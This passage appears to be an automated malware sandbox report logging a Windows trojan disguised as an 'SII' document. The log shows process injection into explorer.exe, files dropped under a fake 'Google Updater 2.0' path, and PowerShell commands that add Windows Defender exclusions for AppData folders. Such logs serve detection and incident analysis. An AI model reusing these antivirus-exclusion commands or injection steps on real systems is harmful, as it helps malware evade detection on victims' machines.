                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 41381F3
                      Source: C:\Windows\SysWOW64\explorer.exe | Memory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Process created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                      Source: C:\Windows\SysWOW64\explorer.exe | Process created: unknown unknown
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Process created: unknown unknown
                      Source: Documento--SII--33875.exe, 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, explorer.exe, 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp | Binary or memory string: DownloadVersionListSoftware\Microsoft\Internet Explorer\VersionManager%LOCALAPPDATA%\Microsoft\Internet Explorer\VersionManager\versionlist.xml11.0Shell_TrayWnd%s\%sNT AUTHORITYSYSTEM\mscoree.dllrunasopenCreateProcessInternalWntdll.dll/%sSOFTWARE\Microsoft\NET Framework Setup\NDP ,, 
jarfile\shell\open\commandSYSTEM\CurrentControlSetZwMapUserPhysicalPagesScatterZwWow64CallFunction64ZwWaitHighEventPairbf'J&';qyy4RpaTqqg\{szPmBbf'J&';qyy4RpaTqqg\{szBfsvJzf;qyy4Fsv\fS|ypEgzapvapqzyp&';qyy4F]Vgptap\apxSgzxEtgf|{r[txp{vglea;qyy4FfyP{vgleaEtv~pafpv`g&';qyy4P{vgleaXpfftrpb|{ag`fa;qyy4B|{Cpg|slAg`fa{pate|&';qyy4[pa@fpgRpa\{sz`gyxz{;qyy4@GYQzb{yztqAzS|ypB`gyxz{;qyy4Zwat|{@fpgTrp{aFag|{rvzxvay&';qyy4Atf~Q|tyzr\{q|gpvatqcte|&';qyy4VgptapEgzvpffB|a}Az~p{B`fpg&';qyy4V}t{rpB|{qzbXpfftrpS|yapg~pg{py&';qyy4@eqtapEgzvA}gptqTaag|w`ap~pg{py&';qyy4\{|a|ty|opEgzvA}gptqTaag|w`apY|fa~pg{py&';qyy4VgptapEgzvpff\{apg{tyB~pg{py&';qyy4RpaA}gptq\q~pg{py&';qyy4RpaXteepqS|yp[txpB~pg{py&';qyy4RpaEgzq`va\{sz{aqyy;qyy4GayD`pglPypcta|z{Sytrf{aqyy;qyy4bvffag{aqyy;qyy4xpxvel{aqyy;qyy4xpxfpa{aqyy;qyy4GayFpaP{c|gz{xp{aCtg|twyp{aqyy;qyy4GayD`pglP{c|gz{xp{aCtg|twypJ@{aqyy;qyy4GayD`pglP{c|gz{xp{aCtg|twyp{aqyy;qyy4GayFpaP{c|gz{xp{aCtg{aqyy;qyy4QwrWgpt~Ez|{a{aqyy;qyy4Qwr@|RpaA}gptqQpw`rZw
                      Source: CpSHySoEfzH.exe, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmp | Binary or memory string: Progman
                      Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
                      Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
                      Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: _GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,MultiByteToWideChar,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: GetLocaleInfoW,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: _GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: _GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,MultiByteToWideChar,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: EnumSystemLocalesA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: GetLocaleInfoA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: GetLocaleInfoW,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: EnumSystemLocalesA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: _GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: GetLocaleInfoA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: GetLocaleInfoA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\SysWOW64\explorer.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\Windows\SysWOW64\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\Windows\SysWOW64\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
